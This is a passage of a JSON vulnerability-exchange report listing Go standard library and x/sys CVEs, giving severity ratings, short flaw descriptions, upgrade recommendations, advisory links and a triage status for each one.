          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Enforce a recursion limit in Unmarshal to prevent stack exhaustion when parsing deeply-nested, recursive structures.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33818"
        },
        {
          "url": "https://go.dev/cl/814980"
        },
        {
          "url": "https://go.dev/issue/80405"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33818"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33818"
        }
      ],
      "published": "2026-08-13T22:17:19+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39821",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1289
      ],
      "description": "The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode(\"xn--example-.com\") incorrectly returns the name \"example.com\" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject \"example.com\" but permit \"xn--example-.com\". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name \"example.com\".",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39821"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23264"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26546"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26547"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30650"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30853"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30854"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30855"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33155"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33163"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33173"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33183"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33524"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34357"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34359"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34364"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34789"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35827"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35828"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35829"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35830"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35831"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35993"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35994"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36167"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36207"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36648"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36797"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36808"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36820"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36883"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37436"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38995"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39005"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39573"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39879"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40118"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40945"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41030"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41031"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41036"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41930"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42043"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42047"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42048"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42049"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42050"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42051"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42080"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42082"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42142"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42146"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42150"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42240"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42852"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43052"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43692"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44622"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44624"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:46395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47735"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47737"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47952"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50300"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50843"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51033"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51112"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51187"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51194"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51341"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53412"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53413"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53415"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53530"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54191"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54284"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54285"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54287"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54401"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54441"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54580"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56223"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56340"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56431"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-39821"
        },
        {
          "url": "https://bugzilla.redhat.com/2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/2484207"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498152"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39821"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39822"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-46395.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:37435"
        },
        {
          "url": "https://github.com/golang/go/issues/78760"
        },
        {
          "url": "https://go.dev/cl/767220"
        },
        {
          "url": "https://go.dev/issue/78760"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-39821.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-46395.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39821"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5026"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-39821.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8416-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39821"
        }
      ],
      "published": "2026-05-22T16:16:20+00:00",
      "updated": "2026-08-19T12:18:01+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-39824",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [],
      "cwes": [
        190
      ],
      "description": "NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error.",
      "recommendation": "Upgrade golang.org/x/sys to version 0.44.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39824"
        },
        {
          "url": "https://go.dev/cl/770080"
        },
        {
          "url": "https://go.dev/issue/78916"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5024"
        }
      ],
      "published": "2026-05-22T20:16:33+00:00",
      "updated": "2026-07-23T16:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:golang/golang.org/x/sys@v0.7.0",
          "versions": [
            {
              "version": "v0.7.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/golang.org/x/sys@v0.7.0"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/golang.org/x/sys@v0.7.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-46600",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Parsing an invalid SVCB or HTTPS RR can panic when the size of a parameter value overflows the message buffer.",
      "recommendation": "Upgrade stdlib to version 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-46600"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-46600"
        },
        {
          "url": "https://go.dev/cl/786345"
        },
        {
          "url": "https://go.dev/issue/79795"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46600"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5942"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-46600"
        }
      ],
      "published": "2026-07-21T20:17:01+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56853",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "When a server is configured to support unencrypted HTTP/2, it reads a few bytes from each new connection to see if they contain the HTTP/2 client preface. ReadHeaderTimeout is unexpectedly not being applied when doing this.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56853"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56853"
        },
        {
          "url": "https://go.dev/cl/795540"
        },
        {
          "url": "https://go.dev/issue/80205"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56853"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6089"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56853"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56858",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        79
      ],
      "description": "Previously, pathological inputs could close an unescaped '/' early, allowing for attack-controlled data to inject arbitrary content, potentially leading to XSS.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56858"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56858"
        },
        {
          "url": "https://go.dev/cl/807100"
        },
        {
          "url": "https://go.dev/issue/80435"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56858"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6091"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56858"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56859",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Previously, DecodeElement would reset the depth counter causing it to never fire; this could lead to stack exhaustion.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56859"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56859"
        },
        {
          "url": "https://go.dev/cl/803320"
        },
        {
          "url": "https://go.dev/issue/80481"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56859"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6088"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56859"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56860",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        407
      ],
      "description": "Previously, resolving relative paths containing parent directory ('..') segments performed string conversions and buffer rewrites on each step, resulting in quadratic time complexity and high memory allocation overhead. Now, path resolution operates on a byte buffer using index-based backtracking for '..' segments, eliminating the quadratic time complexity and significantly reducing memory allocations.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56860"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56860"
        },
        {
          "url": "https://go.dev/cl/803681"
        },
        {
          "url": "https://go.dev/issue/80494"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56860"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6218"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56860"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T17:19:13+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56862",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Handshake messages, such as KeyUpdate, are always considered as state-advancing, regardless of whether a handshake has been completed or not. As a result, a malicious client can keep sending KeyUpdate messages to force the server to keep performing key derivation operations indefinitely.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56862"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56862"
        },
        {
          "url": "https://go.dev/cl/804261"
        },
        {
          "url": "https://go.dev/issue/80528"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56862"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6090"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56862"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    }
  ]
}